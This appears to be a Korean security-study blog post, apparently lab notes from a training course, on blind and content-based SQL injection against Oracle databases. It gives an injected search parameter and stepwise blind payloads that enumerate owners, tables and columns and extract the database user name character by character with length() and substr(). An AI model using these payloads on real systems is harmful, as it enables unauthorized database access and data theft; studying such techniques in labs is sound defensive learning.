์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

Oracle Blind Based

  • -
๋ฐ˜์‘ํ˜•
Contents Based

1=1 and title(์ฐธ) ๊ณผ 1=2 and title(๊ฑฐ์ง“) > test(๊ธฐ์ค€๋ฌธ์ž) ์ถœ๋ ฅ ๋˜๋ƒ ์•ˆ๋˜๋ƒ์˜ ์œ ๋ฌด

search_type=1=1+andtitle&keyword=test		# ์ฐธ :	๊ธฐ์ค€๋ฌธ์ž test๊ฐ€ ์ถœ๋ ฅ
search_type=1=2+andtitle&keyword=test		# ๊ฑฐ์ง“ : ๊ธฐ์ค€๋ฌธ์ž test๊ฐ€ ์ถœ๋ ฅ ๋˜์ง€ ์•Š์Œ
Blind Based

์„œ๋ฒ„์˜ ์ฐธ/๊ฑฐ์ง“์— ์‘๋‹ต๊ฐ’์„ ๊ฐ€์ง€๊ณ  ๋ฌธ์ž์—ด์„ ์œ ์ถ”

3๊ฐ€์ง€ ํƒ์ƒ‰ ๋ฐฉ์‹

1. ์ˆœ์ฐจ ํƒ์ƒ‰

2. ์ด์ง„ ํƒ์ƒ‰

3. ๋น„ํŠธ ์—ฐ์‚ฐ ํƒ์ƒ‰

 

๋น„ ์ˆœ์ฐจ ํƒ์ƒ‰๋ฐฉ์‹ ( ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ์กฐํšŒ )

# 1. ์‚ฌ์šฉ์ž ๊ณ„์ • ๊ฐœ์ˆ˜ ์„ธ๊ธฐ
SELECT count(*) FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE owner like '%C##%';
# rownum์€ 1์ค„๋งŒ ์ถœ๋ ฅํ•˜๊ธฐ์œ„ํ•ด ( ํ•˜๋‚˜์˜ ๋ ˆ์ฝ”๋“œ์™€ ํ•˜๋‚˜์˜ ์ปฌ๋Ÿผ๋งŒ ์ถœ๋ ฅํ•˜๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉ )
# ๋‹ค๋งŒ ํ˜„์žฌ ์ •๋ณด ํƒˆ์ทจ์˜ ํ™˜๊ฒฝ์€ Blind ์ด๊ธฐ ๋•Œ๋ฌธ์— ๋น„ ์ˆœ์ฐจ๋ฐฉ์‹์œผ๋กœ ์กฐํšŒ๊ฐ€ ํ•„์š”
# ๊ทธ๋ ‡๊ธฐ์— ์•„๋ž˜ ์ฝ”๋“œ๋ฅผ ์จ์•ผํ•œ๋‹ค.
SELECT count(*) FROM (SELECT DISTINCT owner FROM all_tables) WHERE owner like'%C##%';

# 2. ์‚ฌ์šฉ์ž ๊ณ„์ • ์ถœ๋ ฅํ•˜๊ธฐ
SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables WHERE owner like '%C##%')) WHERE r=1;
SELECT owner FROM (SELECT rownum r, owner FROM all_tables WHERE owner like '%C##%') WHERE r=1;	# ๊ตณ์ด ์ค‘๋ณต์ œ๊ฑฐ ์‚ฌ์šฉํ•  ํ•„์š” ์—†๊ธฐ์— ์‚ญ์ œ

 

 

 

2. C##KITRI ๊ณ„์ •์˜ ํ…Œ์ด๋ธ” ๋น„์ˆœ์ฐจ ๋ชฉ๋กํ™”

2-1 ์ฐพ๊ณ ์žํ•˜๋Š” ํ…Œ์ด๋ธ”์„ '%%' ์œ ์ถ”ํ•˜์—ฌ ์œ ์ถ”๋œ ํ…Œ์ด๋ธ”์˜ ๊ฐœ์ˆ˜ ํƒ์ƒ‰

SELECT count(*) FROM (SELECT rownum r,table_name FROM all_tables WHERE owner='C##KITRI' and table_name like '%MEM%');

2-2  ํƒ์ƒ‰๋œ ํ…Œ์ด๋ธ”์ด 1๊ฐœ๋ผ๋ฉด ๊ทธ ํ…Œ์ด๋ธ” ์ด๋ฆ„ ์กฐํšŒ

SELECT table_name FROM all_tables WHERE owner='C##KITRI' and table_name like '%MEM%';

์˜ค๋ผํด ํ•จ์ˆ˜ ์‚ฌ์šฉ๋ฒ•

MYSQL		:	length(test);	์ถœ๋ ฅ ๊ฒฐ๊ณผ : 4
Oracle		:	length(test);	์ถœ๋ ฅ ๊ฒฐ๊ณผ : 4

Count(*)๋„ ๋™์ผ
# ๋‹ค๋งŒ ORACLE์—์„œ๋Š” SUBSTR์„ ์‚ฌ์šฉํ•œ๋‹ค

 

3. C##KITRI ๊ณ„์ •์˜ ์ปฌ๋Ÿผ ๋น„์ˆœ์ฐจ ๋ชฉ๋กํ™”

3-1 ์ฐพ๊ณ ์žํ•˜๋Š” ์ปฌ๋Ÿผ์„ '%%' ์œ ์ถ”ํ•˜์—ฌ ์œ ์ถ”๋œ ์ปฌ๋Ÿผ์˜ ๊ฐœ์ˆ˜ ํƒ์ƒ‰

SELECT count(*) FROM (SELECT rownum r,column_name FROM all_tab_columns WHERE owner='C##KITRI' and table_name='MEMBERS' and column_name like '%ID%');

3-2  ํƒ์ƒ‰๋œ ํ…Œ์ด๋ธ”์ด 1๊ฐœ๋ผ๋ฉด ๊ทธ ํ…Œ์ด๋ธ” ์ด๋ฆ„ ์กฐํšŒ

 

๋ธ”๋ผ์ธ๋“œ ํ”„๋กœ์„ธ์Šค

1. ํ•ด๋‹น ๊ณ„์ • ๋ฐ ํ…Œ์ด๋ธ”,์ปฌ๋Ÿผ ๊ฐœ์ˆ˜(count(*))๋ฅผ ์ฐพ๋Š”๋‹ค. ๋‹จ, ๊ธฐ๋ณธ์ •๋ณด 3๊ฐ€์ง€๋Š” 1๊ฐœ ์ด๋ฏ€๋กœ ๊ฐœ์ˆ˜๋ฅผ ์ฐพ์„ ํ•„์š” ์—†์Œ

2. ํ•ด๋‹น ๊ณ„์ • ๋ฐ ํ…Œ์ด๋ธ”, ์ปฌ๋Ÿผ์˜ ์ด๋ฆ„์„ (like'%%') ๋ฌธ์ž๋กœ ์œ ์ถ”ํ•œ๋‹ค

3. ํ•ด๋‹น ๋ฌธ์ž์˜ ๊ธ€์ž์ˆ˜(length())๋ฅผ ์œ ์ถ”ํ•œ๋‹ค.

4. ์ˆœ์ฐจํƒ์ƒ‰, ์ด์ง„ํƒ์ƒ‰, ๋น„ํŠธ ์—ฐ์‚ฐ ํƒ์ƒ‰(substr())์„ ์ด์šฉํ•˜์—ฌ ํ•˜๋‚˜ํ•˜๋‚˜ ์ฐธ/๊ฑฐ์ง“ ๊ฐ’์„ ๋ฝ‘์•„๋‚ธ๋‹ค.

5. ์กฐํ•ฉํ•œ๋‹ค.

 

์‚ฌ์šฉ์ž ์ด๋ฆ„ ์ฐพ๊ธฐ

1. ๊ธฐ๋ณธ 3๊ฐ€์ง€ ๋ชฉ๋กํ™” ไธญ ์‚ฌ์šฉ์ž ์ด๋ฆ„ ์ฐพ๊ธฐ ( SID๋ฅผ ์œ ์ถ”ํ•˜์—ฌ XE๋ฅผ ๋ฐํ˜”๋‹ค๋Š” ๊ฐ€์ • ํ•˜ ์ง„ํ–‰ )

๊ธฐ๋ณธ ๊ตฌ๋ฌธ : SELECT user FROM dual
์œ ์ถ” ๊ตฌ๋ฌธ : length((SELECT user FROM dual))=8	# ๊ธฐ์ค€๋ฌธ์ž match๊ฐ€ ๋œ๋‹ค

# ํƒ์ƒ‰ ๊ตฌ๋ฌธ
substr((SELECT user FROM dual),1,1)='C'
substr((SELECT user FROM dual),2,1)='#'
substr((SELECT user FROM dual),3,1)='#'
substr((SELECT user FROM dual),4,1)='K'
substr((SELECT user FROM dual),5,1)='I'
substr((SELECT user FROM dual),6,1)='T'
substr((SELECT user FROM dual),7,1)='R'
substr((SELECT user FROM dual),8,1)='I'
# ์‚ฌ์šฉ์ž ๊ณ„์ •์€ ๋ชจ๋‘ ๋Œ€๋ฌธ์ž

2. ์‚ฌ์šฉ์ž ๊ณ„์ •๋“ค์„ ๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ ๋ชฉ๋กํ™” ์ง„ํ–‰

๊ธฐ๋ณธ ๊ตฌ๋ฌธ : SELECT DISTINCT owner FROM all_tables;
๊ฐœ์ˆ˜ ๊ตฌ๋ฌธ : (SELECT count(*) FROM (SELECT DISTINCT owner FROM all_tables WHERE owner like '%C##%'))=2
# > 2๊ฐœ ์ถœ๋ ฅ๋œ๋‹ค - rownum์„ ์‚ฌ์šฉํ•ด์•ผํ•œ๋‹ค

# ์œ ์ถ” ๊ตฌ๋ฌธ
length((SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables WHERE owner like '%C##%')) WHERE r=1))=8

# ํƒ์ƒ‰ ๊ตฌ๋ฌธ
substr((SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables WHERE owner like '%C##%')) WHERE r=1),1,1)='C'

 

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

SQL Injection ์ธ์ฆ ์šฐํšŒ  (0) 2022.07.07
SQL Injection - Error Based  (0) 2022.07.06
ORACLE Union Based  (0) 2022.07.06
Oracle database ๊ณต๊ฒฉ ์‹ค์Šต  (0) 2022.07.05
ORACLE INJECTION  (0) 2022.07.05
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.